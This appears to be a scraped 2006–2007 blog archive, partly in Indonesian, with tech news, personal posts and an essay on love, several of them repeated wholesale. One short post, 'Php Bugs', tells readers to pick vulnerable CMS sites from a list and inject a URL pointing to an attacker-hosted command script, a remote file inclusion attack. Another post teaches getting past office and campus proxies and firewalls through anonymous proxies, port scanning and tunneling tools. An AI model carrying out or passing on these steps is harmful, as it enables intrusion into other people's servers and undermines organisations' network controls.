A new secure VPN tunneling protocol is cooking in the labs at Microsoft. The new form of VPN tunnel is called SSTP (Secure Socket Tunneling Protocol). Microsoft is scheduled to
introduce SSTP in Windows Vista Service Pack 1 and in Longhorn Server.
Currently, there are issues involving VPN connections in relation to PPTP GRE port blocking or L2TP ESP port blocking via a firewall or a NAT router, preventing the client to reach the server. Microsoft is laboring to deliver ubiquitous connectivity through VPN.
The Secure Socket Tunneling Protocol “will allow VPN tunnel connectivity across any scenarios i.e. behind NAT routers or firewalls or web proxies. And the best part of it - your end user remote access experience (like using RAS dialer) and network administration experience (like using RRAS server) remains same as before. i.e. SSTP based VPN tunnel just acts as a one more VPN tunnel that gets plugged into MS VPN client and VPN servers,” revealed Samir Jain, Lead Program Manager, RRAS, Windows Enterprise Networking, adding that the SSTP based VPN protocol will be made available as a beta together with Longhorn server Beta3.
Via the Secure Socket Tunneling Protocol (SSTP), the VPN tunnel will function over Secure-HTTP. In this manner, the problems with VPN connections based on the Point-to-Point Tunneling Protocol (PPTP) or Layer 2 Tunneling Protocol (L2TP) will be eliminated. Web proxies, firewalls and Network Address Translation (NAT) routers located on the path between clients and servers will no longer block VPN connections.
“The good part of SSTP is it integrates with MS RAS client/server infrastructure seamlessly. For example, SSTP supports password + strong user authentication (like smart-card, RSA securID, etc) using various PPP authentication algorithm. Other features of RAS (like generating profiles using connection manager administration kit, remote access policies, etc) - just works - similar to other PPTP/L2TP,” added Samir Jain.
Saturday, January 20, 2007
Microsoft, Google Agree to NGO Code of Conduct
"Technology companies have come under fire for providing equipment or software that permits governments to censor information or monitor the online or offline activities of their citizens. For example, last year, Google's approach to the China market was criticized over its creation of a censored, local version of its search engine. Microsoft, Google, and two other technology companies will develop a code of conduct with a coalition of nongovernmental organizations (NGO) to promote freedom of expression and privacy rights, they announced Friday. The two companies along with Yahoo, and Vodafone Group said the new guidelines are the result of talks with Business for Social Responsibility (BSR) and the Berkman Center for Internet & Society at Harvard Law School."
Friday, January 19, 2007
Melangkah ke Depan
Jurnal Hidup Seorang yang Bernama Arthur
Itulah temanku yang baru membangun blognya kembali setelah ditinggalkannya blognya yang lama. Dan dengan bangganya mendeklarasikan dirinya yang sok merendah meninggikan mutu.... Loh kok jadi sewot gw ^_^ becanda thur.
Arthur pria putih kurus yang ternyata keturunan Manado-Cina-Bali ini (pura2 nya baru tau). Dengan wajahnya yang ganteng selalu didambakan wanita-wanita di sekitarnya. selain berperawakan menarik otak nya juga encer (ampe luber dan kopong, becanda lagi thur ^_^).
Udah ah males ngomongin arthur, bosen dari mata merem ampe merem lagi liatnya dia (ato emang karena gw sipit yah ;) Yah pokoknya Arthur adalah onyon, onyon adalah arthur.... apa lagi sih gw ... udah ah makin ngaco ajah gw.
Ngantuk blom tidur 2 hari, sibuk .... maen cewe ... loh kok, khan makin ngaco ajah khan. Blom tidurnya bener ... ngejar setoran coy.
Cukup sudah untuk hari ini ...... Melangkah ke depan .... tidur dulu .... zzzz...
Itulah temanku yang baru membangun blognya kembali setelah ditinggalkannya blognya yang lama. Dan dengan bangganya mendeklarasikan dirinya yang sok merendah meninggikan mutu.... Loh kok jadi sewot gw ^_^ becanda thur.
Arthur pria putih kurus yang ternyata keturunan Manado-Cina-Bali ini (pura2 nya baru tau). Dengan wajahnya yang ganteng selalu didambakan wanita-wanita di sekitarnya. selain berperawakan menarik otak nya juga encer (ampe luber dan kopong, becanda lagi thur ^_^).
Udah ah males ngomongin arthur, bosen dari mata merem ampe merem lagi liatnya dia (ato emang karena gw sipit yah ;) Yah pokoknya Arthur adalah onyon, onyon adalah arthur.... apa lagi sih gw ... udah ah makin ngaco ajah gw.
Ngantuk blom tidur 2 hari, sibuk .... maen cewe ... loh kok, khan makin ngaco ajah khan. Blom tidurnya bener ... ngejar setoran coy.
Cukup sudah untuk hari ini ...... Melangkah ke depan .... tidur dulu .... zzzz...
Judge Rules That IBM Did Not Destroy Evidence
"From the latest in the SCO saga, Judge Wells ruled today that IBM did not destroy evidence as SCO claims. During discovery, SCO claims it found an IBM executive memo that ordered its programmers to delete source code, and so it filed a motion to prevent IBM from destroying more evidence. The actuality of the memo was less nefarious. An IBM executive wanted to ensure that the Linux developers were sandboxed from AIX/Dynix. So he ordered them to remove local copies of any AIX code from their workstations so that there would not be a hint of taint. The source code still existed in CVMC and was not touched. Since the source code was still in CMVC, Judge Wells ruled IBM did not destroy it. Incredulously, SCO's Mark James requested that IBM tell SCO how to obtain the information. IBM's Todd Shaughnessy responded that all during discovery (when IBM gave SCO a server with their CMVC database) SCO never once said that they were unable to find that information from CMVC. Judge Wells asked IBM to help SCO out in any way he could."
The Human Brain Must Forget the Mother Tongue When Learning a New Language
| The process is named "first language attrition" |
| By: Stefan Anitei, Science Editor |
 After one year of scholarship in Spain, you surely master the language of the conquistadors like none around you, but why is everybody picking on you, saying you are boasting (believe me, I personally experienced something like this). In fact, people will be in the situation to find it hard to return to their native language.This phenomenon is named “first-language attrition” and puzzled researchers for a long time: how was it possible to forget, even momentarily, words you have used fluently all your life.Psychologist Benjamin Levy and Dr. Michael Anderson at University of Oregon found that this forgetting is not a passive fact, due to the simple disuse of the mother tongue language, but an active process inflicted by the brain itself that impedes us using words of the native language, which would make learning and speaking the new language harder. This forgetfulness is - in fact - an active adaptive strategy to better “catch” the second language. The researchers used native English speakers who had made at least one year of college level Spanish to answer repeatedly the name of various objects in Spanish. The more the students were using the Spanish words, the harder they found it to encounter the corresponding English labels for the objects. In fact, using the foreign language inhibits the corresponding labels in the native language, and appears as “first language attrition”. Nevertheless, the more fluent bilingual students were, far less prone to experience the attrition they were. Thus, “first language attrition” is a key factor during the initial stages of second language learning. When we begin to learn a new language, our brain starts to actively inhibit our easily accessible native language words while trying to imprint in our mind a new idiom. When bilingualism advances, the attrition turns less necessary, so the subjects in the study were better in shifting between the two languages. It may look paradoxical, but "first-language attrition provides a striking example of how it can be adaptive to (at least temporarily) forget things one has learned." |
Knoppix 5.1.1: Now with eye candy
The new year has brought a new release of the Knoppix live CD. Along with the usual updates to application software, the most noticeable change in version 5.1.1 is the inclusion of the Beryl 3-D desktop with the Emerald theming engine.
| |
Since support for Beryl is still experimental, the 3-D desktop is provided in Knoppix as an option. To enable it, you have to use the knoppix desktop=beryl cheat code on boot. Considering the current status of Beryl, the new 3-D desktop works surprisingly well; it starts without any problems on a lowly Acer TravelMate 243 laptop with an Intel 82855 GM integrated graphics controller, and it feels snappy and is a joy to use. While some may consider the inclusion of Beryl in Knoppix a gimmick, it provides a great introduction to the whole 3-D desktop idea. Installing Beryl can be a tricky and time-consuming business, so the ability to try the fancy 3-D desktop with zero effort is a boon for all users looking for some Linux eye candy.
As usual, most software packages have also been updated. Knoppix 5.1.1 comes with KDE 3.5.5, GNOME 2.14 (available in the Knoppix DVD edition only), and OpenOffice.org 2.1. Following the recent Mozilla/Debian controversy, the Firefox browser and the Thunderbird email client have been replaced in Knoppix 5.1.1 with Iceweasel and Icedove respectively. Among useful software additions is the mkbootdev script, which allows you to create a bootable USB stick -- a handy tool for making a USB version of Knoppix. Of course, the most important software news in Knoppix 5.1.1 is without a doubt the inclusion of the latest Frozen Bubble game, which now supports multi-player network games.
 | |
| Click to enlarge |
As always, the new version of Knoppix comes in CD and DVD editions, which are available for download from mirrors listed at the Knoppix Web site. All in all, this release continues the fine tradition of delivering solid updates to the already great live CD Linux distro.
Dmitri Popov is a freelance writer whose articles have appeared in Russian, British, German, and Danish computer magazines.
Thursday, January 18, 2007
Indonesia's Largest IP/MPLS Core Expands In NGN Rollout
PT Telkom Commits to M-Series Multiservice Platform for Advanced IP Services.
Siemens and Juniper Networks, Inc. today announced that PT Telkom, Indonesia’s leading telecommunications service provider, has further expanded its IP/MPLS-based core infrastructure with additional Juniper Networks M-series multiservice routing platforms including the M320. The upgrade, performed by Siemens, builds on PT Telkom’s existing M-series routers, deployed last year as part of an initial Next Generation Network (NGN) rollout. The new deployment spans 17 cities, connecting softswitch systems and legacy routers.
“After more than a year of intensive use, our earlier M-series deployment has demonstrated the superiority and flexibility of Juniper’s JUNOS Operating System,” said Mr. Abdul Haris, PT Telkom’s Director of Network and Solutions and the service provider’s Chief Technology Officer. “We were also impressed by the routers’ traffic engineering capability, strict QoS adherence even under extremely heavy load, and Juniper’s high availability features, such as fast reroute and in-service upgrading. We are confident to stay with Juniper and its routing solutions for our long-term NGN strategy.”
The M-series multiservice routers are part of the Juniper Networks family of best-of-class routing platforms which also include the market leading E-series Broadband Services Routers and T-series next-generation core routers. Juniper Networks E-, M- and T-series routing platforms deliver industry-leading levels of performance, reliability and scale to enable service providers to deliver high-quality voice, video, data and other advanced services over an IP/MPLS network with assured levels of performance and security. The T-series is the industry's most proven core routing platform and, with the multi-chassis TX Matrix technology, allows service providers to scale to multi-terabit rates without the risks associated with new and unproven technologies.
“Our M-series deployment at PT Telkom is a great example of the benefits of migrating to a next generation IP/MPLS-based infrastructure,” said Adam Judd, vice president of Asia Pacific for Juniper Networks. “Asia Pacific’s need for capacity to deliver advanced services – including VoIP, realtime video, broadband access, and VPN services – continues to grow, and service providers such as PT Telkom are leveraging Juniper’s industry leading platforms to address this demand and capture new revenue opportunities.”
Siemens and Juniper Networks, Inc. today announced that PT Telkom, Indonesia’s leading telecommunications service provider, has further expanded its IP/MPLS-based core infrastructure with additional Juniper Networks M-series multiservice routing platforms including the M320. The upgrade, performed by Siemens, builds on PT Telkom’s existing M-series routers, deployed last year as part of an initial Next Generation Network (NGN) rollout. The new deployment spans 17 cities, connecting softswitch systems and legacy routers.
“After more than a year of intensive use, our earlier M-series deployment has demonstrated the superiority and flexibility of Juniper’s JUNOS Operating System,” said Mr. Abdul Haris, PT Telkom’s Director of Network and Solutions and the service provider’s Chief Technology Officer. “We were also impressed by the routers’ traffic engineering capability, strict QoS adherence even under extremely heavy load, and Juniper’s high availability features, such as fast reroute and in-service upgrading. We are confident to stay with Juniper and its routing solutions for our long-term NGN strategy.”
The M-series multiservice routers are part of the Juniper Networks family of best-of-class routing platforms which also include the market leading E-series Broadband Services Routers and T-series next-generation core routers. Juniper Networks E-, M- and T-series routing platforms deliver industry-leading levels of performance, reliability and scale to enable service providers to deliver high-quality voice, video, data and other advanced services over an IP/MPLS network with assured levels of performance and security. The T-series is the industry's most proven core routing platform and, with the multi-chassis TX Matrix technology, allows service providers to scale to multi-terabit rates without the risks associated with new and unproven technologies.
“Our M-series deployment at PT Telkom is a great example of the benefits of migrating to a next generation IP/MPLS-based infrastructure,” said Adam Judd, vice president of Asia Pacific for Juniper Networks. “Asia Pacific’s need for capacity to deliver advanced services – including VoIP, realtime video, broadband access, and VPN services – continues to grow, and service providers such as PT Telkom are leveraging Juniper’s industry leading platforms to address this demand and capture new revenue opportunities.”
The Contradictory Nature of OOXML
"the Microsoft Office XML-based format specification, OOXML, is now in the adoption queue at ISO/IEC. That process takes six months, and has two steps. During the first one-month step, any member may submit 'contradictions,' which means aspects in which a proposed standard conflicts with already adopted ISO/IEC standards and Directives. Those contradictions must then be 'resolved' (which does not necessarily mean eliminated), and these resolutions are then presented back to the members to consider during the five-month voting stage that follows. A month isn't very long to do a line-by-line analysis of a 6,000-page spec, but experts in the national standards bodies around the world are doing just that. What they are finding includes the use of proprietary, hard-wired elements rather than incorporation of available ISO/IEC standards; additional Microsoft technology that must be emulated (but is not covered by the Microsoft patent pledge); elements that can't be implemented without Microsoft technical assistance; dependencies on Windows itself; mandatory bugs; and more. And then there's also the fact that OOXML heavily overlaps ODF — a platform-independent, already-adopted ISO/IEC. It promises to be an interesting battle." And an anonymous reader adds word of the release, after 10 months of development, of Docvert 3.0, an open-source web service that converts DOC files to Oasis OpenDocument 1.0 (download the source here).
Monday, March 20, 2006
LOVE ISN'T BLIND
" When two people love each other, nothing is more
imperative and
delightful than giving. " - Guy de Maupassant -
Cinta berpijak pada perasaan sekaligus akal sehat.
Miskonsepsi pertama
yang ditentang Bowman adalah manusia jatuh cinta
dengan menggunakan
perasaan belaka. Betul, kita jatuh cinta dengan
hati. Tapi agar tidak
menimbulkan kekacauan di kemudian hari, kita
diharapkan untuk juga
menggunakan akal sehat.
Bohong besar kalau kita bisa jatuh cinta dengan
begitu saja tanpa bisa
mengelak. Yang sesungguhnya terjadi, proses jatuh
cinta dipengaruhi
tradisi, kebiasaan, standar, gagasan, dan deal
kelompok dari mana kita
berasal.
Bohong besar pula kalau kita merasa boleh berbuat
apa saja saat jatuh
cinta, dan tidak bisa dimintai pertanggungjawaban
bila
perbuatan-perbuatan impulsif itu berakibat buruk
suatu ketika nanti.
Kehilangan perspektif bukanlah pertanda kita jatuh
cinta, melainkan
sinyal kebodohan. Cinta membutuhkan proses, Bowman
juga menolak anggapan
cinta bisa berasal dari pandangan pertama. "Cinta
itu tumbuh dan
berkembang dan merupakan emosi yang kompleks,"
katanya.
Untuk tumbuh dan berkembang, cinta membutuhkan
waktu. Jadi memang tidak
mungkin kita mencintai seseorang yang tidak
ketahuan asal-usulnya
dengan begitu saja.
Cinta tidak pernah menyerang tiba-tiba, tidak juga
jatuh dari langit.
Cinta datang hanya ketika dua individu telah
berhasil melakukan
orientasi ulang terhadap hidup dan memutuskan
untuk memilih orang lain
sebagai titik fokus baru. Yang mungkin terjadi
dalam fenomena "cinta
pada pandangan pertama" adalah pasangan terserang
perasaan saling
tertarik yang sangat kuat bahkan sampai
tergila-gila. Kemudian perasaan
kompulsif itu berkembang jadi cinta tanpa menempuh
masa jeda. Dalam
kasus "cinta pada pandangan pertama", banyak
orang tidak benar-benar
mencintai pasangannya, melainkan jatuh cinta pada
konsep cinta itu
sendiri. Sebaliknya dengan orang yang benar-benar
mencinta, mereka
mencintai pasangan sebagai persolinatas yang utuh.
Cinta tidak menguasai dan mengalah, tapi berbagi.
Bukan cinta namanya
bila kita berkehendak mengontrol pasangan. Juga
bukan cinta bila kita
bersedia mengalah demi kepuasan kekasih. Orang
yang mencinta tidak
menganggap kekasih sebagai atasan atau bawahan,
tapi sebagai pasangan
untuk berbagi, juga untuk mengidentifikasi diri.
Bila kita berkeinginan
menguasai kekasih (membatasi pergaulannya,
melarangnya beraktivitas
positif, mengatur seleranya berbusana, selalu
mengkritik semua
kekurangannya) atau melulu mengalah (tidak protes
bila kekasih berbuat
buruk, tidak keberatan dinomorsekiankan), berarti
kita belum siap
memberi dan menerima cinta.
Cinta itu konstruktif.
Individu yang mencinta berbuat sebaik-baiknya demi
kepentingan sendiri
sekaligus demi (kebanggaan) pasangan. Dia berani
berambisi, bermimpi
konstruktif, dan merencanakan masa depan.
Sebaliknya dengan yang jatuh
cinta impulsif. Bukannya berpikir dan bertindak
konstruktif, dia
kehilangan ambisi, nafsu makan, dan minat terhadap
masalah sehari-hari.
Yang dipikirkan hanya kesengsaraan pribadi.
Impiannya pun tak mungkin
tercapai. Bahkan impian itu bisa menjadi subsitusi
kenyataan.
Cinta terhitung sehat bila saat dekat dan jauh
dari pasangan, kita
menyukainya dalam kadar sebanding.
Cinta tidak bertumpu pada daya tarik fisik
Dalam hubungan cinta, daya tarik fisik memang
penting. Tapi bahaya bila
kita menyukai kekasih hanya sebatas fisik dan
membencinya untuk banyak
faktor lainnya. Saat jatuh cinta, kita menikmati
dan memberi makna
penting bagi setiap kontak fisik. Kontak fisik,
ketahuilah, hanya terasa
menyenangkan bila kita dan pasangan saling
menyukai personalitas
masing-masing. Maka bukan cinta namanya, melainkan
nafsu, bila kita
menganggap kontak fisik hanya memberi sensasi
menyenangkan tanpa makna
apa-apa. Dalam cinta, afeksi terwujud belakangan
saat hubungan kian
dalam. Sedang nafsu menuntut pemuasan fisik sedari
permulaan.
Cinta tidak buta, tapi menerima
Cinta itu buta? Tidak sama sekali. Orang yang
mencinta melihat dan
menyadari sisi buruk kekasih. Karena besarnya
cinta, dia berusaha
menerima dan mentolerir. Tentu ada keinginan agar
sisi buruk itu
membaik. Namun keinginan itu haruslah didasari
perhatian dan maksud
baik. Tidak boleh ada kritik kasar, penolakan,
kegeraman, atau rasa
jijik. Nafsulah yang buta. Meski pasangan sangat
buruk, orang yang
menjalin hubungan dengan penuh nafsu menerima
tanpa keinginan
memperbaiki. Juga meninggalkan pasangan saat
keinginannya terpuaskan,
hanya karena pasangan punya secuil keburukan yang
sangat mungkin
diperbaiki.
Cinta memperhatikan kelanjutan hubungan
Orang yang benar-benar mencinta memperhatikan
perkembangan hubungan
dengan kekasih. Dia menghindari segala hal yang
mungkin merusak
hubungan. Sebisa mungkin dia melakukan tindakan
yang bisa memperkuat,
mempertahankan, dan memajukan hubungan. Orang yang
sedang tergila-gila
mungkin saja berusaha keras menyenangkan kekasih.
Namun usaha itu
semata-mata dilakukan agar kekasih menerimanya,
sehingga tercapailah
kepuasan yang diincar. Orang yang mencinta
menyenangkan pasangan untuk
memperkuat hubungan.
Cinta berani melakukan hal menyakitkan
Selain berusaha menyenangkan kekasih, orang yang
sungguh-sungguh
mencinta memiliki perhatian, keprihatinan,
pengertian, dan keberanian
untuk melakukan hal yang tidak disukai kekasih
demi kebaikan. Seperti
seorang ibu yang berkata "tidak" saat anaknya
meminta es krim, padahal
sedang flu.
Begitulah kita semua seharusnya bersikap pada
pasangan....
imperative and
delightful than giving. " - Guy de Maupassant -
Cinta berpijak pada perasaan sekaligus akal sehat.
Miskonsepsi pertama
yang ditentang Bowman adalah manusia jatuh cinta
dengan menggunakan
perasaan belaka. Betul, kita jatuh cinta dengan
hati. Tapi agar tidak
menimbulkan kekacauan di kemudian hari, kita
diharapkan untuk juga
menggunakan akal sehat.
Bohong besar kalau kita bisa jatuh cinta dengan
begitu saja tanpa bisa
mengelak. Yang sesungguhnya terjadi, proses jatuh
cinta dipengaruhi
tradisi, kebiasaan, standar, gagasan, dan deal
kelompok dari mana kita
berasal.
Bohong besar pula kalau kita merasa boleh berbuat
apa saja saat jatuh
cinta, dan tidak bisa dimintai pertanggungjawaban
bila
perbuatan-perbuatan impulsif itu berakibat buruk
suatu ketika nanti.
Kehilangan perspektif bukanlah pertanda kita jatuh
cinta, melainkan
sinyal kebodohan. Cinta membutuhkan proses, Bowman
juga menolak anggapan
cinta bisa berasal dari pandangan pertama. "Cinta
itu tumbuh dan
berkembang dan merupakan emosi yang kompleks,"
katanya.
Untuk tumbuh dan berkembang, cinta membutuhkan
waktu. Jadi memang tidak
mungkin kita mencintai seseorang yang tidak
ketahuan asal-usulnya
dengan begitu saja.
Cinta tidak pernah menyerang tiba-tiba, tidak juga
jatuh dari langit.
Cinta datang hanya ketika dua individu telah
berhasil melakukan
orientasi ulang terhadap hidup dan memutuskan
untuk memilih orang lain
sebagai titik fokus baru. Yang mungkin terjadi
dalam fenomena "cinta
pada pandangan pertama" adalah pasangan terserang
perasaan saling
tertarik yang sangat kuat bahkan sampai
tergila-gila. Kemudian perasaan
kompulsif itu berkembang jadi cinta tanpa menempuh
masa jeda. Dalam
kasus "cinta pada pandangan pertama", banyak
orang tidak benar-benar
mencintai pasangannya, melainkan jatuh cinta pada
konsep cinta itu
sendiri. Sebaliknya dengan orang yang benar-benar
mencinta, mereka
mencintai pasangan sebagai persolinatas yang utuh.
Cinta tidak menguasai dan mengalah, tapi berbagi.
Bukan cinta namanya
bila kita berkehendak mengontrol pasangan. Juga
bukan cinta bila kita
bersedia mengalah demi kepuasan kekasih. Orang
yang mencinta tidak
menganggap kekasih sebagai atasan atau bawahan,
tapi sebagai pasangan
untuk berbagi, juga untuk mengidentifikasi diri.
Bila kita berkeinginan
menguasai kekasih (membatasi pergaulannya,
melarangnya beraktivitas
positif, mengatur seleranya berbusana, selalu
mengkritik semua
kekurangannya) atau melulu mengalah (tidak protes
bila kekasih berbuat
buruk, tidak keberatan dinomorsekiankan), berarti
kita belum siap
memberi dan menerima cinta.
Cinta itu konstruktif.
Individu yang mencinta berbuat sebaik-baiknya demi
kepentingan sendiri
sekaligus demi (kebanggaan) pasangan. Dia berani
berambisi, bermimpi
konstruktif, dan merencanakan masa depan.
Sebaliknya dengan yang jatuh
cinta impulsif. Bukannya berpikir dan bertindak
konstruktif, dia
kehilangan ambisi, nafsu makan, dan minat terhadap
masalah sehari-hari.
Yang dipikirkan hanya kesengsaraan pribadi.
Impiannya pun tak mungkin
tercapai. Bahkan impian itu bisa menjadi subsitusi
kenyataan.
Cinta terhitung sehat bila saat dekat dan jauh
dari pasangan, kita
menyukainya dalam kadar sebanding.
Cinta tidak bertumpu pada daya tarik fisik
Dalam hubungan cinta, daya tarik fisik memang
penting. Tapi bahaya bila
kita menyukai kekasih hanya sebatas fisik dan
membencinya untuk banyak
faktor lainnya. Saat jatuh cinta, kita menikmati
dan memberi makna
penting bagi setiap kontak fisik. Kontak fisik,
ketahuilah, hanya terasa
menyenangkan bila kita dan pasangan saling
menyukai personalitas
masing-masing. Maka bukan cinta namanya, melainkan
nafsu, bila kita
menganggap kontak fisik hanya memberi sensasi
menyenangkan tanpa makna
apa-apa. Dalam cinta, afeksi terwujud belakangan
saat hubungan kian
dalam. Sedang nafsu menuntut pemuasan fisik sedari
permulaan.
Cinta tidak buta, tapi menerima
Cinta itu buta? Tidak sama sekali. Orang yang
mencinta melihat dan
menyadari sisi buruk kekasih. Karena besarnya
cinta, dia berusaha
menerima dan mentolerir. Tentu ada keinginan agar
sisi buruk itu
membaik. Namun keinginan itu haruslah didasari
perhatian dan maksud
baik. Tidak boleh ada kritik kasar, penolakan,
kegeraman, atau rasa
jijik. Nafsulah yang buta. Meski pasangan sangat
buruk, orang yang
menjalin hubungan dengan penuh nafsu menerima
tanpa keinginan
memperbaiki. Juga meninggalkan pasangan saat
keinginannya terpuaskan,
hanya karena pasangan punya secuil keburukan yang
sangat mungkin
diperbaiki.
Cinta memperhatikan kelanjutan hubungan
Orang yang benar-benar mencinta memperhatikan
perkembangan hubungan
dengan kekasih. Dia menghindari segala hal yang
mungkin merusak
hubungan. Sebisa mungkin dia melakukan tindakan
yang bisa memperkuat,
mempertahankan, dan memajukan hubungan. Orang yang
sedang tergila-gila
mungkin saja berusaha keras menyenangkan kekasih.
Namun usaha itu
semata-mata dilakukan agar kekasih menerimanya,
sehingga tercapailah
kepuasan yang diincar. Orang yang mencinta
menyenangkan pasangan untuk
memperkuat hubungan.
Cinta berani melakukan hal menyakitkan
Selain berusaha menyenangkan kekasih, orang yang
sungguh-sungguh
mencinta memiliki perhatian, keprihatinan,
pengertian, dan keberanian
untuk melakukan hal yang tidak disukai kekasih
demi kebaikan. Seperti
seorang ibu yang berkata "tidak" saat anaknya
meminta es krim, padahal
sedang flu.
Begitulah kita semua seharusnya bersikap pada
pasangan....
Friday, March 03, 2006
Php Bugs
Pada awalnya saya menulis PhpInjection hanya untuk pengetahuan sekilas saja.Tapi tampaknya masih banyak orang yang bertanya dan tampaknya makin hari makin banyak bugs yang ditemukan. Hal ini juga dikarenakan makin banyak orang menggunakan dan mengandalkan CMS (Content management system)sebagai langkah cepat dalam membuat suatu website. Memang CMS ini membuat proses pembuatan website menjadi sangat cepat, tapi tanpa disadari hal ini membuat ada nya persamaan antara website yang satu dan yang laen.
Nah klo ada yang sama, karena dibangun diatas script yang sama maka bugs nya pun sama. Berikut ini saya akan lampirkan list bugs yang saya dapat.Buat target.
Lihat aja disini
Nah dari list yang didapat tadi maka kamu bisa memulai pencarian kamu. Setelah dapat target maka kmu ganti dech :
http://www.injection.com/cmd? menjadi http://geocities.com/k4k3_rgb/test?&cmd
Nah jadi dech dan liat hasilnya. Kalo ndak bisa berarti sudah di patch so langsung dech cari yang laen.
Nah klo ada yang sama, karena dibangun diatas script yang sama maka bugs nya pun sama. Berikut ini saya akan lampirkan list bugs yang saya dapat.Buat target.
Lihat aja disini
Nah dari list yang didapat tadi maka kamu bisa memulai pencarian kamu. Setelah dapat target maka kmu ganti dech :
http://www.injection.com/cmd? menjadi http://geocities.com/k4k3_rgb/test?&cmd
Nah jadi dech dan liat hasilnya. Kalo ndak bisa berarti sudah di patch so langsung dech cari yang laen.
Friday, February 24, 2006
Mengakali Proxy Server
Nah pada suatu hari ada teman bertanya : "Mas aku kok tidak bisa buka friendster yach di kantor ku, kayaknya di blog dech di server nya ....". Kenapa hal ini bisa terjadi?Karena Proxy server dan rules pada firewall di Gateway nya.
Nah sebelum itu saya akan memberikan sedikit gambaran tentang proxy server dan Firewall Gateway.
Proxy server;
Apa itu Proxy server?Mari kita tanyakan 'Tante Wiki terlebih dulu...'
"A proxy server is a computer that offers a computer network service to allow clients to make indirect network connections to other network services. A client connects to the proxy server, then requests a connection, file, or other resource available on a different server. The proxy provides the resource either by connecting to the specified server or by serving it from a cache. In some cases, the proxy may alter the client's request or the server's response for various purposes.
A proxy server can also serve as a firewall."
Secara singkatnya adalah server atau mesin untuk mengatur lalu lintas data dalam jaringan dan digunakan untuk menyimpan halaman web yang pernah dikunjungi dalam cache nya untuk memanage penggunaan bandwidth.Sebagai gambaran adalah alamat URL yang sudah pernah dikunjungi akan tersimpan di cache dan semua pemanggilan terhadap URL tertentu akan diarahkan pada simpanan di cache atau di tetapkan rules tertentu.Nah terkadang pada suatu instansi tertentu ditetapkan rules tertentu untuk membatasi penggunaan oleh user, yah contohnya kantor yang tidak dapat membuka www.friendster.com pada saat jam kantor, atau tidak dapat dibukanya website dengan content Pornografi dan kekerasan pada jaringan kampus atau pun sekolah.
Firewall;
Pada kesempatan sebelumnya saya sudah membahas mengenai hal yang satu ini, Lihat artikel Si Tembok Api.Nah yang intinya adalah sebuah sistem baik perangkat keras maupun perangkat lunak yang mengatur dan mencatat lalu lintas data yang keluar dan masuk dari dan ke jaringan lokal.
Nah karena ditetapkannya aturan pada kedua sistem kita inilah maka kita tidak dapat seenaknya menggunakan internet.Tapi jangan khawatir ternyata semua nya itu dapat kita akali.
1. Cara Pertama;
Nah sekali lagi semuanya itu ditetapkan berdasarkan suatu rules, yang dalam hal ini adalah ketentuan penggunaan lalu lintas dan port. Nah yang paling sederhana untuk membatasi pembatasan ini adalah dengan menggunakan anonymous server atau proxy server lain di luar Proxy atau gateway instansi kita.Mangapa hal ini memungkinkan?Karena yang dicatat adalah bahwa kita membuka hanya ke alamat URL dari anonymous browsing atau proxy tersebut sehingga URL mana yang kita tuju dari proxy atau anonymous browsing itu tidak akan terlihat pada proxy atau firewall kita.
Nah untuk contohnya coba ajah : www.guardster.com, www.freebrowsing.com, dll
Nah untuk list proxynya liat ajah di : http://familycode.atspace.com/irc.htm atau di http://www.samair.ru/proxy/socks.htm
2. Cara kedua;
Nah pada cara kedua ini adalah dengan melakukan 'tunneling' terhadap proxy server kita. Nah untuk yang satu ini diperlukan sedikit pengetahuan dan informasi.Nah sebelumnya saya sudah bilang bahwa semuanya hanyalah pengaturan lalu lintas dari data dan port apa yang digunakan.Nah cari taulah port berapa saja yang digunakan dan untuk apa. Nah lakukanlah tehnik scanning. Nah setelah kita tahu maka gunakanlah berbagai software yang tersedia di Internet untuk melakukan tunneling proxy. Jangan males yah banyak kok. Tanya ajah om GOOGLE keyword "proxy tunneling".
sebagai contohnya : InvisibleBrowsing, bypass Client, Proxyway, dll
Nah setting dech proxy yang digunakan, dan jika diperlukkan lakukan setting port yang digunakan.
Nah itulah cara ngakali Proxy pada kantor atau kampus kamu. Nah sebenarnya masih ada satu cara lagi dan cukup mudah. Ini adalah kelebihan dari Paman kita yang terkenal baik hati dan menyediakan pada kita segalanya.Ya itulah 'Om Google' kita.GOOGLE...bukan untuk searching tapi untuk jadi anonymous.Kok bisa?Nah kita gunakan salah satu fasilitasnya yaitu translate.
Coba Dech : http://translate.google.com/translate?u=
Nah sebenarnya ini adalah fasilitas GOOGLE untuk mentranslate isi website, tetapi jika tidak ada akan ditampilkan aslinya.Namun cara ini cukup kuno dan kalo admin nya pinter hal ini dapat di cegah.
Nah demikian dulu Saya berbagi informasinya.
Sekian lah tutor kita kali ini. Semua tindakan yang dilakukan karena membaca tutor ini. Artikel ini dibuat hanyalah semata-mata untuk pengetahuan tindakan yang dilakukan karena membaca artikel ini bukanlah tanggung jawab penulis.
Nah sebelum itu saya akan memberikan sedikit gambaran tentang proxy server dan Firewall Gateway.
Proxy server;
Apa itu Proxy server?Mari kita tanyakan 'Tante Wiki terlebih dulu...'
"A proxy server is a computer that offers a computer network service to allow clients to make indirect network connections to other network services. A client connects to the proxy server, then requests a connection, file, or other resource available on a different server. The proxy provides the resource either by connecting to the specified server or by serving it from a cache. In some cases, the proxy may alter the client's request or the server's response for various purposes.
A proxy server can also serve as a firewall."
Secara singkatnya adalah server atau mesin untuk mengatur lalu lintas data dalam jaringan dan digunakan untuk menyimpan halaman web yang pernah dikunjungi dalam cache nya untuk memanage penggunaan bandwidth.Sebagai gambaran adalah alamat URL yang sudah pernah dikunjungi akan tersimpan di cache dan semua pemanggilan terhadap URL tertentu akan diarahkan pada simpanan di cache atau di tetapkan rules tertentu.Nah terkadang pada suatu instansi tertentu ditetapkan rules tertentu untuk membatasi penggunaan oleh user, yah contohnya kantor yang tidak dapat membuka www.friendster.com pada saat jam kantor, atau tidak dapat dibukanya website dengan content Pornografi dan kekerasan pada jaringan kampus atau pun sekolah.
Firewall;
Pada kesempatan sebelumnya saya sudah membahas mengenai hal yang satu ini, Lihat artikel Si Tembok Api.Nah yang intinya adalah sebuah sistem baik perangkat keras maupun perangkat lunak yang mengatur dan mencatat lalu lintas data yang keluar dan masuk dari dan ke jaringan lokal.
Nah karena ditetapkannya aturan pada kedua sistem kita inilah maka kita tidak dapat seenaknya menggunakan internet.Tapi jangan khawatir ternyata semua nya itu dapat kita akali.
1. Cara Pertama;
